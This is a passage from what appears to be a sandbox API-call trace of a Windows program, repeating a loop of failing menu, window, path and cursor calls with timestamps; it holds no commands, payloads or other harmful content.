MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.731] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.731] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.731] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.731] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.731] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.731] GetStockObject (i=6) returned 0x1b00018 [0027.732] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.732] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.732] PathFileExistsW (pszPath=0x0) returned 0 [0027.732] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.732] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.732] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.732] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.732] GetMenu (hWnd=0x0) returned 0x0 [0027.732] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.732] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.732] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.732] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.732] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.732] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.732] GetStockObject (i=6) returned 0x1b00018 [0027.732] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.732] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.732] PathFileExistsW (pszPath=0x0) returned 0 [0027.732] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.732] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.732] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.732] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.732] GetMenu (hWnd=0x0) returned 0x0 [0027.732] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xab) returned -1 [0027.732] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.732] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.732] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.732] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.732] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.732] GetStockObject (i=6) returned 0x1b00018 [0027.732] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.732] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.732] PathFileExistsW (pszPath=0x0) returned 0 [0027.732] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.733] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.733] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.733] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.733] GetMenu (hWnd=0x0) returned 0x0 [0027.733] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.733] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.733] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.733] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.733] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.733] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.733] GetStockObject (i=6) returned 0x1b00018 [0027.733] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.733] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.733] PathFileExistsW (pszPath=0x0) returned 0 [0027.733] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.733] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.733] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.733] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.733] GetMenu (hWnd=0x0) returned 0x0 [0027.733] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.733] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.733] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.733] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.733] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.733] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.733] GetStockObject (i=6) returned 0x1b00018 [0027.733] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.733] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.733] PathFileExistsW (pszPath=0x0) returned 0 [0027.733] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.733] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.733] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.733] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.734] GetMenu (hWnd=0x0) returned 0x0 [0027.734] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.734] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.734] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.734] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.734] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.734] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.734] GetStockObject (i=6) returned 0x1b00018 [0027.734] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.734] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.734] PathFileExistsW (pszPath=0x0) returned 0 [0027.734] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.734] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.734] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.734] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.734] GetMenu (hWnd=0x0) returned 0x0 [0027.734] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.734] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.734] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.734] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.734] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.734] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.734] GetStockObject (i=6) returned 0x1b00018 [0027.734] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.734] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.734] PathFileExistsW (pszPath=0x0) returned 0 [0027.734] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.734] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.734] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.734] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.734] GetMenu (hWnd=0x0) returned 0x0 [0027.734] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xe) returned -1 [0027.734] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.734] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.735] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.735] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.735] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.735] GetStockObject (i=6) returned 0x1b00018 [0027.735] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.735] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.735] PathFileExistsW (pszPath=0x0) returned 0 [0027.735] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.735] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.735] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.735] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.735] GetMenu (hWnd=0x0) returned 0x0 [0027.735] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.735] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.735] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.735] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.735] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.735] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.735] GetStockObject (i=6) returned 0x1b00018 [0027.735] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.735] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.735] PathFileExistsW (pszPath=0x0) returned 0 [0027.735] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.735] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.735] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.735] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.735] GetMenu (hWnd=0x0) returned 0x0 [0027.735] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.735] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.735] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.735] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.735] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.735] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.735] GetStockObject (i=6) returned 0x1b00018 [0027.736] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.736] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.736] PathFileExistsW (pszPath=0x0) returned 0 [0027.736] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.736] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.736] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.736] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.736] GetMenu (hWnd=0x0) returned 0x0 [0027.736] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.736] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.736] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.736] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.736] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.736] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.736] GetStockObject (i=6) returned 0x1b00018 [0027.736] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.736] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.736] PathFileExistsW (pszPath=0x0) returned 0 [0027.736] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.736] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.736] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.736] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.736] GetMenu (hWnd=0x0) returned 0x0 [0027.736] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.736] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.736] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.736] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.736] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.736] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.736] GetStockObject (i=6) returned 0x1b00018 [0027.736] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.736] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.736] PathFileExistsW (pszPath=0x0) returned 0 [0027.737] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.737] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.737] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.737] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.737] GetMenu (hWnd=0x0) returned 0x0 [0027.737] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1b0) returned -1 [0027.737] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.737] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.737] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.737] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.737] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.737] GetStockObject (i=6) returned 0x1b00018 [0027.737] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.737] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.737] PathFileExistsW (pszPath=0x0) returned 0 [0027.737] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.737] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.737] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.737] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.737] GetMenu (hWnd=0x0) returned 0x0 [0027.737] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.737] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.737] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.737] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.737] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.737] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.737] GetStockObject (i=6) returned 0x1b00018 [0027.737] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.737] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.737] PathFileExistsW (pszPath=0x0) returned 0 [0027.737] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.737] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.737] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.738] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.738] GetMenu (hWnd=0x0) returned 0x0 [0027.738] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.738] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.738] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.738] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.738] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.738] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.738] GetStockObject (i=6) returned 0x1b00018 [0027.738] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.738] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.738] PathFileExistsW (pszPath=0x0) returned 0 [0027.738] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.738] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.738] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.738] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.738] GetMenu (hWnd=0x0) returned 0x0 [0027.738] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.738] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.738] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.738] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.738] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.738] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.738] GetStockObject (i=6) returned 0x1b00018 [0027.738] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.738] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.738] PathFileExistsW (pszPath=0x0) returned 0 [0027.738] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.738] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.738] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.738] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.738] GetMenu (hWnd=0x0) returned 0x0 [0027.738] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.738] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.739] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.739] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.739] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.739] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.739] GetStockObject (i=6) returned 0x1b00018 [0027.739] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.739] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.739] PathFileExistsW (pszPath=0x0) returned 0 [0027.739] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.739] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.739] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.739] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.739] GetMenu (hWnd=0x0) returned 0x0 [0027.739] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x59d) returned -1 [0027.739] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.739] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.739] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.739] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.739] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.739] GetStockObject (i=6) returned 0x1b00018 [0027.739] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.739] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.739] PathFileExistsW (pszPath=0x0) returned 0 [0027.739] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.739] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.739] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.739] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.739] GetMenu (hWnd=0x0) returned 0x0 [0027.739] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.739] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.739] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.739] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.739] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.739] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.740] GetStockObject (i=6) returned 0x1b00018 [0027.740] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.740] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.740] PathFileExistsW (pszPath=0x0) returned 0 [0027.740] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.740] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.740] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.740] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.740] GetMenu (hWnd=0x0) returned 0x0 [0027.740] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.740] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.740] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.740] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.740] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.740] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.740] GetStockObject (i=6) returned 0x1b00018 [0027.740] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.740] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.740] PathFileExistsW (pszPath=0x0) returned 0 [0027.740] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.740] GetCursorPos (in: lpPoint=0x18f5e4 | out: 